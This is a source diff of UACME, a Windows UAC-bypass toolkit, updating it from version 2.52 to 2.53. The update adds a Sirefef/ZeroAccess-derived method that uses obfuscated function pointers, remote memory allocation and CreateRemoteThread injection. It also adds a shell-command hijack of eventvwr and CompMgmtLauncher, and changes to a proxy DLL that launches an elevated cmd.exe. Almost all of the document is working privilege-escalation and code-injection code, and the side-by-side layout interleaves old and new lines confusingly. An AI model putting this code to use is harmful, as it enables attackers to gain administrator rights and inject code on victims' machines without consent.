za_ctx->pNtAllocateVirtualMemory(hProcess, &remotebuffer, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remotebuffer == NULL)
break; break;
}
if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) { za_ctx->pWriteProcessMemory = RtlDecodePointer(za_ctx->pWriteProcessMemory);
if (!za_ctx->pWriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &sz))
break; break;
za_ctx->ElevatedProcedure = RtlDecodePointer(za_ctx->ElevatedProcedure);
newEp = (char *)remotebuffer + ((char *)za_ctx->ElevatedProcedure - (char *)selfmodule);
newDp = (char *)remotebuffer + ((char *)za_ctx->ElevatedParameters - (char *)selfmodule);
za_ctx->pCreateRemoteThread = RtlDecodePointer(za_ctx->pCreateRemoteThread);
hRemoteThread = za_ctx->pCreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c);
if (hRemoteThread) {
za_ctx->pWaitForSingleObject(hRemoteThread, INFINITE);
za_ctx->pNtClose(hRemoteThread);
bResult = TRUE;
} }
newEp = (char *)remotebuffer + ((char *)elevproc - (char *)selfmodule); } while (bCond);
newDp = (char *)remotebuffer + ((char *)elvpar - (char *)selfmodule);
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c); if (za_ctx != NULL) {
bResult = (hRemoteThread != NULL); if (hProcess != NULL) {
if (bResult) { za_ctx->pNtTerminateProcess = RtlDecodePointer(za_ctx->pNtTerminateProcess);
WaitForSingleObject(hRemoteThread, INFINITE); za_ctx->pNtTerminateProcess(hProcess, 0);
CloseHandle(hRemoteThread); za_ctx->pNtClose(hProcess); //NtClose already decoded
} }
} while (cond); sz = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &za_ctx, &sz, MEM_RELEASE);
if (hProcess != NULL) {
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
} }
return bResult; return bResult;
} }
@ -606,10 +704,9 @@ BOOL ucmGWX(
//summon some unicorns //summon some unicorns
Ptr = supLdrQueryResourceData(KONGOU_ID, g_ctx.Peb->ImageBaseAddress, &DataSize); Ptr = supLdrQueryResourceData(KONGOU_ID, g_ctx.Peb->ImageBaseAddress, &DataSize);
if (Ptr == NULL) { if (Ptr == NULL)
OutputDebugString(TEXT("[UCM] Resource not found"));
break; break;
}
Data = DecompressPayload(Ptr, DataSize, &DecompressedBufferSize); Data = DecompressPayload(Ptr, DataSize, &DecompressedBufferSize);
if (Data == NULL) if (Data == NULL)
break; break;
@ -618,9 +715,8 @@ BOOL ucmGWX(
RtlSecureZeroMemory(szSource, sizeof(szSource)); RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory); _strcpy(szSource, g_ctx.szTempDirectory);
_strcat(szSource, SLC_DLL); _strcat(szSource, SLC_DLL);
if (!supWriteBufferToFile(szSource, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) { if (!supWriteBufferToFile(szSource, g_ctx.PayloadDll, g_ctx.PayloadDllSize))
break; break;
}
//drop fubuki to system32\inetsrv //drop fubuki to system32\inetsrv
RtlSecureZeroMemory(szDest, sizeof(szDest)); RtlSecureZeroMemory(szDest, sizeof(szDest));
@ -651,7 +747,7 @@ BOOL ucmGWX(
_strcat(szTargetApp, INETMGR_EXE); _strcat(szTargetApp, INETMGR_EXE);
bResult = supRunProcess(szTargetApp, NULL); bResult = supRunProcess(szTargetApp, NULL);
if (bResult) { if (bResult) {
OutputDebugString(TEXT("Whoever created this gwx shit must be fired")); OutputDebugString(TEXT("Next time be more creative ESET"));
} }
} while (cond); } while (cond);

33
Source/Akagi/main.c
View File

@ -4,9 +4,9 @@
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 2.52 * VERSION: 2.53
* *
* DATE: 17 Jan 2017 * DATE: 18 Jan 2017
* *
* Program entry point. * Program entry point.
* *
@ -268,7 +268,7 @@ UINT ucmInit(
UINT ucmMain() UINT ucmMain()
{ {
DWORD paramLen; DWORD paramLen;
WCHAR *pDllName; WCHAR *pFileName;
WCHAR szBuffer[MAX_PATH * 2]; WCHAR szBuffer[MAX_PATH * 2];
UINT uResult; UINT uResult;
@ -534,6 +534,9 @@ UINT ucmMain()
case UacMethodComet: case UacMethodComet:
break; break;
case UacMethodEnigma0x3:
break;
} }
//prepare command for payload //prepare command for payload
@ -644,13 +647,13 @@ UINT ucmMain()
} }
#endif #endif
if (g_ctx.dwBuildNumber < 9200) { if (g_ctx.dwBuildNumber < 9200) {
pDllName = POWRPROF_DLL; pFileName = POWRPROF_DLL;
} }
else { else {
pDllName = DEVOBJ_DLL; pFileName = DEVOBJ_DLL;
} }
if (ucmWinSATMethod(pDllName, g_ctx.PayloadDll, g_ctx.PayloadDllSize, (g_ctx.dwBuildNumber <= 10136))) { if (ucmWinSATMethod(pFileName, g_ctx.PayloadDll, g_ctx.PayloadDllSize, (g_ctx.dwBuildNumber <= 10136))) {
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
break; break;
@ -771,6 +774,24 @@ UINT ucmMain()
} }
break; break;
case UacMethodEnigma0x3:
#ifndef _DEBUG
if (g_ctx.IsWow64) { //target application isn't always available under wow64
ucmShowMessage(WOW64STRING);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (g_ctx.dwBuildNumber >= 15007)
pFileName = COMPMGMTLAUNCHER_EXE;
else
pFileName = EVENTVWR_EXE;
if (ucmHijackShellCommandMethod((paramLen != 0) ? szBuffer : NULL, pFileName)) {
return ERROR_SUCCESS;
}
break;
} }
return ERROR_ACCESS_DENIED; return ERROR_ACCESS_DENIED;

120
Source/Akagi/sirefef.h Normal file
View File

@ -0,0 +1,120 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: SIREFEF.H
*
* VERSION: 2.53
*
* DATE: 18 Jan 2017
*
* Prototypes and definitions for Sirefef/ZeroAccess method.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef BOOL(NTAPI *pfnSfCopyFileElevated)(
LPWSTR SourceFileName,
LPWSTR DestinationDir
);
typedef BOOL(NTAPI *pfnCopyFileW)(
_In_ LPCWSTR lpExistingFileName,
_In_ LPCWSTR lpNewFileName,
_In_ BOOL bFailIfExists
);
typedef NTSTATUS(NTAPI *pfnNtAllocateVirtualMemory)(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_In_ ULONG_PTR ZeroBits,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG AllocationType,
_In_ ULONG Protect
);
typedef NTSTATUS(NTAPI *pfnNtTerminateProcess)(
_In_opt_ HANDLE ProcessHandle,
_In_ NTSTATUS ExitStatus
);
typedef NTSTATUS(NTAPI *pfnNtClose)(
_In_ HANDLE Handle
);
typedef HANDLE(NTAPI *pfnCreateRemoteThread)(
_In_ HANDLE hProcess,
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ SIZE_T dwStackSize,
_In_ LPTHREAD_START_ROUTINE lpStartAddress,
_In_opt_ LPVOID lpParameter,
_In_ DWORD dwCreationFlags,
_Out_opt_ LPDWORD lpThreadId
);
typedef DWORD(WINAPI *pfnWaitForSingleObject)(
_In_ HANDLE hHandle,
_In_ DWORD dwMilliseconds
);
typedef BOOL(WINAPI *pfnCreateProcessW)(
_In_opt_ LPCWSTR lpApplicationName,
_Inout_opt_ LPWSTR lpCommandLine,
_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ BOOL bInheritHandles,
_In_ DWORD dwCreationFlags,
_In_opt_ LPVOID lpEnvironment,
_In_opt_ LPCWSTR lpCurrentDirectory,
_In_ LPSTARTUPINFOW lpStartupInfo,
_Out_ LPPROCESS_INFORMATION lpProcessInformation
);
typedef BOOL(WINAPI *pfnWriteProcessMemory)(
_In_ HANDLE hProcess,
_In_ LPVOID lpBaseAddress,
_In_reads_bytes_(nSize) LPCVOID lpBuffer,
_In_ SIZE_T nSize,
_Out_opt_ SIZE_T * lpNumberOfBytesWritten
);
typedef HANDLE(NTAPI *pfnRunProcessEx)(
_In_ LPWSTR lpszParameters,
_In_opt_ LPWSTR lpCurrentDirectory,
_Out_opt_ HANDLE *PrimaryThread,
_Inout_opt_ LPWSTR lpApplicationName
);
typedef struct _ZA_CONTROL_CONTEXT {
//encoded pointers
pfnSfCopyFileElevated SfCopyFile;
pfnNtAllocateVirtualMemory pNtAllocateVirtualMemory;
pfnNtClose pNtClose;
pfnNtTerminateProcess pNtTerminateProcess;
pfnCopyFileW pCopyFileW;
pfnCreateRemoteThread pCreateRemoteThread;
pfnWaitForSingleObject pWaitForSingleObject;
pfnCreateProcessW pCreateProcess;
pfnWriteProcessMemory pWriteProcessMemory;
LPVOID ElevatedProcedure;
pfnRunProcessEx RunProcessEx;
//parameters
ELOAD_PARAMETERS_SIREFEF *ElevatedParameters;
//data buffers
WCHAR szBuffer[MAX_PATH * 2];
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
} ZA_CONTROL_CONTEXT, *PZA_CONTROL_CONTEXT;

44
Source/Akagi/sup.c
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2015 - 2016 * (C) COPYRIGHT AUTHORS, 2015 - 2017
* *
* TITLE: SUP.C * TITLE: SUP.C
* *
* VERSION: 2.50 * VERSION: 2.53
* *
* DATE: 06 July 2016 * DATE: 18 Jan 2017
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -163,10 +163,11 @@ BOOL supRunProcess(
* Start new process in suspended state. * Start new process in suspended state.
* *
*/ */
HANDLE supRunProcessEx( HANDLE NTAPI supRunProcessEx(
_In_ LPWSTR lpszParameters, _In_ LPWSTR lpszParameters,
_In_opt_ LPWSTR lpCurrentDirectory, _In_opt_ LPWSTR lpCurrentDirectory,
_Out_opt_ HANDLE *PrimaryThread _Out_opt_ HANDLE *PrimaryThread,
_Inout_opt_ LPWSTR lpApplicationName
) )
{ {
BOOL cond = FALSE; BOOL cond = FALSE;
@ -174,6 +175,7 @@ HANDLE supRunProcessEx(
SIZE_T ccb; SIZE_T ccb;
STARTUPINFOW sti1; STARTUPINFOW sti1;
PROCESS_INFORMATION pi1; PROCESS_INFORMATION pi1;
DWORD dwFlags = CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS;
if (PrimaryThread) { if (PrimaryThread) {
*PrimaryThread = NULL; *PrimaryThread = NULL;
@ -197,8 +199,7 @@ HANDLE supRunProcessEx(
do { do {
if (!CreateProcessW(NULL, pszBuffer, NULL, NULL, FALSE, if (!CreateProcessAsUser(NULL, lpApplicationName, pszBuffer, NULL, NULL, FALSE, dwFlags | CREATE_SUSPENDED,
CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED,
NULL, lpCurrentDirectory, &sti1, &pi1)) NULL, lpCurrentDirectory, &sti1, &pi1))
{ {
break; break;
@ -724,3 +725,32 @@ VOID NTAPI sxsFindDllCallback(
*StopEnumeration = bFound; *StopEnumeration = bFound;
} }
/*
* supNativeGetProcAddress
*
* Purpose:
*
* Simplified native GetProcAddress.
*
*/
PVOID supNativeGetProcAddress(
WCHAR *Module,
CHAR *Routine
)
{
PVOID DllImageBase = NULL, ProcedureAddress = NULL;
UNICODE_STRING DllName;
ANSI_STRING str;
RtlSecureZeroMemory(&DllName, sizeof(DllName));
RtlInitUnicodeString(&DllName, Module);
if (!NT_SUCCESS(LdrGetDllHandle(NULL, NULL, &DllName, &DllImageBase)))
return NULL;
RtlInitString(&str, Routine);
if (!NT_SUCCESS(LdrGetProcedureAddress(DllImageBase, &str, 0, &ProcedureAddress)))
return NULL;
return ProcedureAddress;
}

16
Source/Akagi/sup.h
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2014 - 2016 * (C) COPYRIGHT AUTHORS, 2014 - 2017
* *
* TITLE: SUP.H * TITLE: SUP.H
* *
* VERSION: 2.50 * VERSION: 2.53
* *
* DATE: 07 July 2016 * DATE: 18 Jan 2017
* *
* Common header file for the program support routines. * Common header file for the program support routines.
* *
@ -45,10 +45,11 @@ BOOL supRunProcess(
_In_opt_ LPWSTR lpszParameters _In_opt_ LPWSTR lpszParameters
); );
HANDLE supRunProcessEx( HANDLE NTAPI supRunProcessEx(
_In_ LPWSTR lpszParameters, _In_ LPWSTR lpszParameters,
_In_opt_ LPWSTR lpCurrentDirectory, _In_opt_ LPWSTR lpCurrentDirectory,
_Out_opt_ HANDLE *PrimaryThread _Out_opt_ HANDLE *PrimaryThread,
_Inout_opt_ LPWSTR lpApplicationName
); );
void supCopyMemory( void supCopyMemory(
@ -112,4 +113,9 @@ VOID NTAPI sxsFindDllCallback(
_In_ OUT BOOLEAN *StopEnumeration _In_ OUT BOOLEAN *StopEnumeration
); );
PVOID supNativeGetProcAddress(
WCHAR *Module,
CHAR *Routine
);
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)

3
Source/Akagi/uacme.vcxproj
View File

@ -241,6 +241,7 @@
<ClCompile Include="..\Shared\_strstri.c" /> <ClCompile Include="..\Shared\_strstri.c" />
<ClCompile Include="carberp.c" /> <ClCompile Include="carberp.c" />
<ClCompile Include="comet.c" /> <ClCompile Include="comet.c" />
<ClCompile Include="enigma0x3.c" />
<ClCompile Include="gootkit.c" /> <ClCompile Include="gootkit.c" />
<ClCompile Include="hybrids.c" /> <ClCompile Include="hybrids.c" />
<ClCompile Include="main.c" /> <ClCompile Include="main.c" />
@ -259,6 +260,7 @@
<ClInclude Include="comet.h" /> <ClInclude Include="comet.h" />
<ClInclude Include="compress.h" /> <ClInclude Include="compress.h" />
<ClInclude Include="consts.h" /> <ClInclude Include="consts.h" />
<ClInclude Include="enigma0x3.h" />
<ClInclude Include="global.h" /> <ClInclude Include="global.h" />
<ClInclude Include="gootkit.h" /> <ClInclude Include="gootkit.h" />
<ClInclude Include="hybrids.h" /> <ClInclude Include="hybrids.h" />
@ -267,6 +269,7 @@
<ClInclude Include="pitou.h" /> <ClInclude Include="pitou.h" />
<ClInclude Include="resource.h" /> <ClInclude Include="resource.h" />
<ClInclude Include="simda.h" /> <ClInclude Include="simda.h" />
<ClInclude Include="sirefef.h" />
<ClInclude Include="sup.h" /> <ClInclude Include="sup.h" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>

9
Source/Akagi/uacme.vcxproj.filters
View File

@ -90,6 +90,9 @@
<ClCompile Include="comet.c"> <ClCompile Include="comet.c">
<Filter>Source Files</Filter> <Filter>Source Files</Filter>
</ClCompile> </ClCompile>
<ClCompile Include="enigma0x3.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="global.h"> <ClInclude Include="global.h">
@ -143,6 +146,12 @@
<ClInclude Include="comet.h"> <ClInclude Include="comet.h">
<Filter>Header Files</Filter> <Filter>Header Files</Filter>
</ClInclude> </ClInclude>
<ClInclude Include="sirefef.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="enigma0x3.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ResourceCompile Include="Resource.rc"> <ResourceCompile Include="Resource.rc">

2
Source/Akagi/uacme.vcxproj.user
View File

@ -13,7 +13,7 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>24</LocalDebuggerCommandArguments> <LocalDebuggerCommandArguments>25</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup> </PropertyGroup>
</Project> </Project>

8
Source/Fubuki/dllmain.c
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2014 - 2016 * (C) COPYRIGHT AUTHORS, 2014 - 2017
* *
* TITLE: DLLMAIN.C * TITLE: DLLMAIN.C
* *
* VERSION: 2.51 * VERSION: 2.53
* *
* DATE: 10 July 2016 * DATE: 18 Jan 2017
* *
* Proxy dll entry point, Fubuki Kai Ni. * Proxy dll entry point, Fubuki Kai Ni.
* *
@ -258,7 +258,7 @@ BOOL WINAPI DllMain(
_strcpy(cmdbuf, sysdir); _strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe")); _strcat(cmdbuf, TEXT("cmd.exe"));
if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, if (CreateProcessAsUserW(NULL, cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
sysdir, &startupInfo, &processInfo)) sysdir, &startupInfo, &processInfo))
{ {
CloseHandle(processInfo.hProcess); CloseHandle(processInfo.hProcess);

BIN
Source/Fubuki/version.rc
View File

Binary file not shown.

9
Source/Shared/ntos.h
View File

@ -4647,7 +4647,6 @@ VOID NTAPI RtlSetLastWin32Error(
LONG Win32Error LONG Win32Error
); );
NTSTATUS NTAPI RtlWow64EnableFsRedirection( NTSTATUS NTAPI RtlWow64EnableFsRedirection(
_In_ BOOLEAN Wow64FsEnableRedirection _In_ BOOLEAN Wow64FsEnableRedirection
); );
@ -4657,6 +4656,14 @@ NTSTATUS NTAPI RtlWow64EnableFsRedirectionEx(
_Out_ PVOID *OldFsRedirectionLevel _Out_ PVOID *OldFsRedirectionLevel
); );
PVOID NTAPI RtlEncodePointer(
PVOID Ptr
);
PVOID NTAPI RtlDecodePointer(
PVOID Ptr
);
typedef NTSTATUS typedef NTSTATUS
(NTAPI * PRTL_HEAP_COMMIT_ROUTINE)( (NTAPI * PRTL_HEAP_COMMIT_ROUTINE)(
IN PVOID Base, IN PVOID Base,

39
UACME.sha256
View File

@ -1,5 +1,5 @@
d7f2d1ddb7807be1c1f8d8ceb770e9e5ddca2ad638541065e07073d438369660 *Compiled\Akagi32.exe 2c3639e512a4726e3a7d6a82a23db8dda079482584bc4987b66efe45a652981e *Compiled\Akagi32.exe
82bf545c9af11bdb4ece39f837d168cee56c45f3c3544338fe31189eebb243d1 *Compiled\Akagi64.exe 4a90948c7ac0c09d7340f5cfb0801285fe5ca4d2ed713c5e82b2799bb80feea1 *Compiled\Akagi64.exe
098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln 098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
@ -10,33 +10,36 @@ a482ae2d4e1d0a8a1fe69e70c616800cc4cdab41d77bcbf3f391911eb8f3f44d *Source\Akagi\b
e087dfb09004d72749ffa94e016860683a7c20f147346e1acf0f561da400e9f1 *Source\Akagi\bin64res.rc e087dfb09004d72749ffa94e016860683a7c20f147346e1acf0f561da400e9f1 *Source\Akagi\bin64res.rc
31561a29aeef347b9eb2d763dd13ec5efbf524309ae3e73009e916d5a298213e *Source\Akagi\carberp.c 31561a29aeef347b9eb2d763dd13ec5efbf524309ae3e73009e916d5a298213e *Source\Akagi\carberp.c
35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h 35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
cc0428d23de17fe3987f16c80bf958a1365db34b3a9121ebc622b76ca6decbfc *Source\Akagi\comet.c 3163a5938ab4f15082f0960e30f39d29bd5a120e692134db8a7da2ea6c6b1978 *Source\Akagi\comet.c
ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c
be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
117b7a1fc984f75cafc6a9613703ef920018f1188ac241aa609dc70f71c0d208 *Source\Akagi\consts.h 6b91a330d0364f46649103359ac5b5151bfce528e071bf359f2d70fb1fed7120 *Source\Akagi\consts.h
3f7d65507e3c26e9bc01b67b6f305a15337d3f34114a41d1c0c387fc857f8c08 *Source\Akagi\global.h 12ab1a9c817e811b9bc717bd0d97a7c4ccd1fcf1aff3286f8678b469c1f705f5 *Source\Akagi\enigma0x3.c
68ca3022e53c0cd73faf2e6f890ff3442c6026145d6443d435ff515baa89a894 *Source\Akagi\enigma0x3.h
4fb5fb9ea92bb1126bc2c4a9182a92563f35154b159d0760b7448952e6b5e135 *Source\Akagi\global.h
5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c 5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
46ca3d450773a8b39fc5caccdeabbad1bf7cef0a1694bd94284ca75c02085b38 *Source\Akagi\hybrids.c 8761ed178e2a91e89bc1421a903f82f10364bbb598fa519178a4f324b6b97f65 *Source\Akagi\hybrids.c
81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h 81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
4d07f686c54d03cb592a03ac22b03e6012c218e8b771d45afe667fbcad92cf43 *Source\Akagi\main.c a6490b6febfd183dcfd66aa9f01bfdc5d545e40a92f33aed2947a0dc2a503eb9 *Source\Akagi\main.c
dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h 67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
7e3ce9159f8d80775c476bfe1e3eaed960cd0053c569ec44791936ae2546301b *Source\Akagi\pitou.c 7e3ce9159f8d80775c476bfe1e3eaed960cd0053c569ec44791936ae2546301b *Source\Akagi\pitou.c
7f8aec0ef71310198ba697c1acc8bdeff64279b039b82c6761f110bbd92e6dfb *Source\Akagi\pitou.h 7f8aec0ef71310198ba697c1acc8bdeff64279b039b82c6761f110bbd92e6dfb *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
dc8f2a3c2bfffb5b88cbfc8ca0d99e38a44d1343ee15013858b99022c6ff2d75 *Source\Akagi\Resource.rc bfec6d928158f2f4d8de2f9b509dd6e46a0b6993db64ceb2734ed848e8f48314 *Source\Akagi\Resource.rc
d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c
9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h 9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h
7e2bee1be67d96edca66ea19aac60896b97449af72da653206102930ae676aca *Source\Akagi\sup.c 41af5a0b6ae9d510689410c183cb30537ec30084a32620d5734675ff780bdf5c *Source\Akagi\sirefef.h
ee7b5b03ff6401b82fae2eb453603cbb7a39d81d1bca1d0cb835e92baaaf4c2d *Source\Akagi\sup.h a1b963ca686e4b595ae23ca18296e5f2b8190f5a7feece7faba8c0be4fe26acc *Source\Akagi\sup.c
472953271f598efcd79e4a741df77188c60bfb3b2867cb7465fa068e387362a9 *Source\Akagi\uacme.vcxproj 247b69ae74d383d57c33a9db45ed18f436e0db9e918e0c8216267a1b91488cec *Source\Akagi\sup.h
c6986aecdf474a9ac568fd122956a016c2583156448627c1c9f60d7b08d5f306 *Source\Akagi\uacme.vcxproj.filters f822ad0e3793d6da0823af18df42d36855f957303a86b9600b9f3051f03a6156 *Source\Akagi\uacme.vcxproj
69ef84d851e52fa90e78232720740a13addb67a3a72936bf159559db05085cbe *Source\Akagi\uacme.vcxproj.user 00e5a7fa7a42ee0a196f9f8391dd32afae69cc6d6aa9d573ef3a2c32b82ba495 *Source\Akagi\uacme.vcxproj.filters
a848ec296f79f6eca82202e1ebf95d69da8ab16cfa336418ce9a9e36fe81ae0c *Source\Akagi\bin\Fubuki32.cd fc119d09e357972a5b3f5914510d126b8563efb741bea05c21104d9b15c3006b *Source\Akagi\uacme.vcxproj.user
0cb9aff9b689c6ffb1b0f307caec4a3b67dbd459a610dcca72cd9be70a4b6094 *Source\Akagi\bin\Fubuki64.cd 087f64ac18b054724e683d0ef92a885e19a8e1fe43405d71144ac9692b58e21a *Source\Akagi\bin\Fubuki32.cd
dd5c530a8c5a7d80ed541cafa566ed2af664bac6ea558fbe0773378ecc837e85 *Source\Akagi\bin\Fubuki64.cd
0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd 0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
65ccadb5660c32cd9bfb6d27673b8ccea966ce383881b0fa71b260922c773fc6 *Source\Akagi\bin\Hibiki64.cd 65ccadb5660c32cd9bfb6d27673b8ccea966ce383881b0fa71b260922c773fc6 *Source\Akagi\bin\Hibiki64.cd
b062e2be5a17984dce931536ba80785bd95d8dc9a1bfc21c0b22315712f4bca7 *Source\Akagi\bin\Ikazuchi32.cd b062e2be5a17984dce931536ba80785bd95d8dc9a1bfc21c0b22315712f4bca7 *Source\Akagi\bin\Ikazuchi32.cd
@ -46,11 +49,11 @@ c650a5448056d708d21799617246ee47f9569afa5415e78f9be07d85055ead46 *Source\Akagi\b
28cc1e0994cc8fb7d87cc13d7bbc800480ddd1f5242f5050ff06e8d9d9767048 *Source\Fubuki\dll.vcxproj 28cc1e0994cc8fb7d87cc13d7bbc800480ddd1f5242f5050ff06e8d9d9767048 *Source\Fubuki\dll.vcxproj
d26d437c4410b29f2b428fde9f7a029b5c94429b7aa99f430b629479783e623f *Source\Fubuki\dll.vcxproj.filters d26d437c4410b29f2b428fde9f7a029b5c94429b7aa99f430b629479783e623f *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
e7b65c57289e2669ac50996a89a224b529d0b77cca75b55d274d0454449604cd *Source\Fubuki\dllmain.c 57aa4133d0328d2a44825ff4d8804f52518fdea6e83d9cca7b60c3777324be85 *Source\Fubuki\dllmain.c
c424f02f0764802d4097e5bc8217f6cb777da82e1bc15f6c4d5e7a00174c2483 *Source\Fubuki\export.def c424f02f0764802d4097e5bc8217f6cb777da82e1bc15f6c4d5e7a00174c2483 *Source\Fubuki\export.def
